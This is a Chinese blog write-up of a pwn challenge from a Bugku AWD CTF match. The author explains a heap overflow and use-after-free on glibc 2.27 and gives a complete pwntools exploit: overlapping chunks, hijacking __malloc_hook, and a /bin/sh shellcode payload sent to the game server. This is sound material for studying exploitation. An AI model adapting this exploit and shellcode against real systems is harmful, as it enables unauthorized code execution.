记一次bugku awd的pwn解

已于 2022-03-27 22:09:48 修改
阅读量2.1k 收藏 7
点赞数 2
分类专栏: buuctf 题目 文章标签: pwn
于 2022-03-27 22:06:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123781673
版权

今天晚上6点30闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。
在这里插入图片描述
连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住
直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住
没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出
在这里插入图片描述
再随便翻了翻发现还有一个uaf。
在这里插入图片描述
只不过没有show函数而已。

再看了一下保护
在这里插入图片描述
脑子里瞬间想好了攻击思路,申请到malloc_hook,改malloc_hook为shellcode的地址就行
申请到malloc_hook其实可以借助unstortedbin来,因为malloc_hook和unstortedbin差一个字节。
首先申请0x10 0x410 0x60 0x30 0x30
接着释放0x60,通过0x10改0x410为0x491,也就是将0x410和0x60包住。实现overlapping
释放这0x491再申请0x410这样的话0x60的fd就是unstortedbin了
改最低的一个字节到malloc_hook
0x30的作用就体现出来了,将0x30释放掉,edit改0x30的fd为0x601020
在这里插入图片描述
将shellcode放入这里,然后将malloc_hook改为这个地址,最后malloc的时候就会触发shellcode。
这个时候最玄的事情来了,本地打不通,远程可以打通。。。。。。
笔者没想太多,直接上脚本刷分去了(因为发现其它队伍都不会XD
这里笔者只贴一个普通打远程的脚本

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('192-168-1-50.pvp986.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice :'

def add(size, data):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Size: ', str(size))
    r.sendafter('Data: ', data)

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))

def edit(index, size, data):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))
    r.sendafter('Data: ', data)

add(0x10, 'bbb')    #0
add(0x410, 'aaa')   #1
add(0x60, 'aaaa')   #2
add(0x30, 'aaaa')   #3
add(0x30, 'aaaa') #4

delete(2)

p1 = p64(0) * 3 + p64(0x491)
edit(0, len(p1), p1)

delete(1)

add(0x410, 'aaaa')

p2 = b'a' * 0x410 + p64(0) + p64(0x71) + b'\x30'
edit(1, len(p2), p2)

add(0x60, 'aaaa')

delete(4)

p3 = p64(0x601020)

edit(4, len(p3), p3)

add(0x30, 'aaaa')
#shellcode = "\x48\x31\xc0\x48\xc7\xc0\x3b\x00\x00\x00\x48\x31\xff\x48\xc7\xc7\x48\x10\x60\x00\x48\x31\xf6\x48\x31\xd2\x0f\x05"

shellcode = asm('''
xor rsi,rsi
mul esi
push rax
mov rbx,0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall
''')

add(0x30, shellcode)

add(0x60, p64(0x601020))

r.recvuntil('Wellcome To the Heap World\n')
r.send('1'.ljust(8, '\x00'))
 
r.send(str(0xf0).ljust(8, '\x00'))

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
awd的批量脚本 pwn_一次AWD反杀之旅
weixin_39611340的博客
12-20 1147
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的时候由于技术师傅的手误,前两轮设置后台check扣分的时候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
【2020安洵杯线下赛】AWD的第一道pwn
古月浪子的博客
12-18 2419
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
CISCN华东南(AWDP)PWN题全WP
最新发布
qq_41683953的博客
06-25 1102
CISCN华东南(AWDP)PWN题全WP
Bugku S3 AWD排位赛-4 pwn
z1r0的博客
09-10 921
设计的还有点有缺陷的,web和pwn都用的一个环境,web可以直接拿到pwn的flag(cat /home/ctf/flag),导致了web手能直接拿双倍的分(web+pwn),分两个环境就可以决问题了。修起来也简单,直接把下面的fgets的64改成16就可以了,再提一嘴,pwn patch好了之后覆盖了原来的pwn会出现pwn运行不起来的情况:(,就出现了web+pwn双宕机。吐槽一下,好几个战队什么都没干的突然飞到前10,一轮开始几秒之后一个队直接飞到8千多分,pwn打完一轮从第二轮就打不了了。
Bugku S3 AWD排位赛-1 pwn
z1r0的博客
07-31 1155
利用格式化漏洞改a64l为system,v4传入/bin/sh即可getshell。因为s只能32,所以偏移可以采用gdb调试出来。
AWDPWN题流量捕获和反打实验
m0_52249553的博客
05-09 1606
这里用一个vps模拟被攻击的远程主机,并在其上面用tcpdump监听pwn题所在的端口,然后根据攻击流量,编写exp脚本复现攻击。
PwnWAF:用于AWDpwn日志工具
05-16
PWA文件 用于AWDpwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将录信息: +-----+ |child| --> execute /path/to/elf/test.bin
一次bugku awd pwn4月19日
z1r0的博客
04-19 1368
一次bugku awd pwn4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
awd的批量脚本 pwn_Luz pwn题目批量部署脚本(一题一容器)
weixin_39861920的博客
12-20 530
一题一个docker,优点是便于单个题目的维护,缺点比较占用资源多题目部署在一个docker的见这里,但是为了避免权限过高带来的跨题目读取flag等问题,这个大佬锁死了可执行的命令,以至于部分题目直接使用"cat flag"等命令直接报错#coding:utf-8#by:Luzimportosimportsysimportrandomimporttimedefcreatflag()...
awd的批量脚本 pwn_北极星杯 awd复现
weixin_39811101的博客
01-12 957
北极星杯 awd复现服务器共有3个web和一个pwnweb11,down下web1的源码,使用D盾扫描:2,漏洞1:发现三个冰蝎的木马,和一个一句话木马冰蝎的后门需要使用冰蝎的客户端进行连接:如图:一句话木马直接使用菜刀或蚁剑连接即可:3,漏洞2:sqlhelper.php的反序列化漏洞:构造payload:class A{public $name;public $male;function __...
AWD相关知识
02-19
CTF可以通过题模式与竞赛级别进行不同方式的分类。在题模式方向,主要可以分为夺旗模式与攻防模式;而在竞赛级别上则根据比赛类型的不同分为:国际性CTF竞赛、国家级信息安全竞赛、企业CTF与高校CTF等等不同级别。
网鼎杯2020半决赛awdplus题目
12-07
网鼎杯2020半决赛awd plus题目,包含pwn和web,压密码在公告文本里。pwn ciri未开放无压密码
awd的批量脚本 pwn_星盟安全团队10.26AWD训练赛总结
weixin_39633089的博客
01-02 492
前言和往常一样,这次已经是咱们星盟的第六次线上awd比赛了,曾经我问老大这样的意义,老大说了句,玉不琢不成器,本次比赛还是那样刺激,16支队伍实力都挺强,学会了点姿势来总结一下,提示本篇你不一定能学到技术,大佬勿喷,一种思路技巧。骑马打马。。。比赛时间2019年10月26日 19:00内容pwn* 2web* 2比赛规则每个队伍分配到一个docker主机,给定web (web)/pwn(...
awd的批量脚本 pwn_AWD攻防之web入门篇
weixin_29210759的博客
01-01 1800
前言AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。常见操作 1. 修改ssh密码当我们拿到服务器后,需要第一时间修改密码防止被他人窃用 2. 1 修改数...
awd的批量脚本 pwn_[原创]第一届护网杯线下决赛awd之shell多
weixin_39571403的博客
12-20 646
前言好久不打比赛,顺便来北京实习就参加了护网杯。排名虽然有所提高但还是被各种大表哥吊打。(和企业参赛简直痛苦)这里带来决赛中awd比赛pwn题shell的两种漏洞利用方式。程序保护保护全开程序分析程序模拟了一个受限shell命令行的功能。一共有10个shell功能,根据漏洞利用方式可以分为两类。第一类:ls,pwd,passwd,login,exit其中passwd和login是假的利用方式。就是...
awd pwn——LIEF学习
CoLin的pwn小屋
04-04 2088
python LIEF库学习
2023金盾杯awd pwn wp
weixin_51480590的博客
12-04 648
由于浅拷贝,这里仍然可以访问到chunk7的内容,注意到chunk的idx类型为uint_8,所以此时chunk7的索引变成了0x40。将bins中的Node申请出来,此刻索引为7的chunk仍然与浅复制的Node共享chunk,所以我们删除其中一个时,一定会有另一个Node指向,也就是说,调用。为了避免size为0,释放第0个chunk与第7个chunk,这时chunk结构如下图所示,之后,我们再将释放的堆块申请回来。只不过需要注意的一点是,Chunk的idx类型是uint_8,这也是这道题的重点。
CISCN 2023 华中分区赛 awd pwn——tsh
CoLin的pwn小屋
07-10 1992
CISCN 2023 awd pwn 分析
bugku s2 awd排位赛-9
12-07
bugku s2 awd排位赛-9是什么游戏名称的比赛呢?如果是bugku s2 awd排位赛-9这个比赛的名称,可以具体描述一下这个比赛的情况和内容吗?比如比赛的规则、参与者、赛程安排等等。这样我才能更好地回答你关于这个比赛的问题。 如果bugku s2 awd排位赛-9是某个游戏或竞赛的名称,我需要更多的信息才能准确地回答你的问题。比如是在哪个游戏平台上进行的比赛?参与者的胜负情况如何?有没有一些特殊的规则或要求?只有了了这些信息,我才能为你提供确切的回答。 希望你能提供更多的细节,这样我才能帮助你更好地回答有关bugku s2 awd排位赛-9的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值